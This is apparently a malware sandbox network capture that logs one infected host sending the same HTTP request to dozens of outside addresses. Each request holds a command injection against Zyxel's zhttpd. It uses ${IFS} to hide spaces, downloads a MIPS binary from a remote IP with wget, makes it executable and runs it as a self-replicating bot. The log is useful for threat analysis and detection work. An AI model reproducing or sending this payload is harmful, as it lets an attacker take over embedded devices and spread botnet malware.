                                            Jan 14, 2024 15:50:45.542684078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6028192.168.2.235825239.56.174.1443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542733908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6029192.168.2.2351954107.124.122.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542757034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6030192.168.2.2355244107.151.232.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542790890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6031192.168.2.2336872213.66.37.207443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542798042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6032192.168.2.234150471.144.186.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542829037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6033192.168.2.2358470182.58.27.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542875051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6034192.168.2.233533432.124.149.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542921066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6035192.168.2.233572212.33.127.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542943001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6036192.168.2.234766696.99.194.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542962074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6037192.168.2.2357630176.130.143.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543016911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6038192.168.2.2335732175.104.64.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543032885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6039192.168.2.2348038139.58.168.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543052912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6040192.168.2.234804449.91.245.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543107986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6041192.168.2.234732654.199.48.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543122053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6042192.168.2.235540289.32.217.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543168068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6043192.168.2.2343886179.45.116.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543210030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6044192.168.2.2349344201.142.161.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543237925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6045192.168.2.234174445.233.74.166443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543261051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6046192.168.2.235817483.28.207.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543306112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6047192.168.2.2355436110.188.53.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543330908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6048192.168.2.2337076201.227.179.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543356895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6049192.168.2.2335162113.93.77.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543369055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6050192.168.2.2343372190.149.239.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543431044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6051192.168.2.233897459.171.204.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543440104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6052192.168.2.2341726161.87.155.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543442011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6053192.168.2.233389480.181.201.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543472052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6054192.168.2.2339032120.191.196.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543518066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6055192.168.2.2359166197.206.232.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543534040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6056192.168.2.234330086.142.72.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543575048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6057192.168.2.235806020.93.149.232443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543606043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6058192.168.2.2358016220.56.153.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543668032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6059192.168.2.2351730177.244.112.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543708086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6060192.168.2.2347524165.62.133.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543729067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6061192.168.2.2349354187.235.97.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543729067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6062192.168.2.233939839.244.31.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543730021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6063192.168.2.234681298.74.81.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543780088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6064192.168.2.2337118160.81.192.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543780088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6065192.168.2.2344532123.141.249.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543781042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6066192.168.2.2346218168.78.93.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543804884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6067192.168.2.2347650155.56.97.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543847084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6068192.168.2.235125643.131.162.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543862104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6069192.168.2.2354276142.189.170.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543915987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6070192.168.2.235947696.28.74.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543947935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6071192.168.2.234763872.144.166.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543977022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6072192.168.2.235675689.195.103.166443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.543998003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6073192.168.2.2350282157.253.118.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544038057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6074192.168.2.235242068.133.97.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544070959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6075192.168.2.2356672206.149.128.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544126034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6076192.168.2.2345720210.205.96.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544128895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6077192.168.2.2347452111.170.222.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544171095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6078192.168.2.234905817.203.40.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544194937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6079192.168.2.233730292.59.149.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544215918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6080192.168.2.234922471.14.125.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544259071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6081192.168.2.234686885.62.192.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544275045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6082192.168.2.23411388.204.205.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544321060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6083192.168.2.233643232.78.232.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544339895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6084192.168.2.2336788157.94.129.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544358015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6085192.168.2.233671271.36.60.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544401884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6086192.168.2.2348122141.15.60.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544435024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6087192.168.2.2334830144.7.110.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544464111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6088192.168.2.2337544172.52.123.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544497013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6089192.168.2.2357186112.48.159.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.544524908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6090192.168.2.2358366143.1.224.139443
                                            TimestampBytes transferredDirectionData
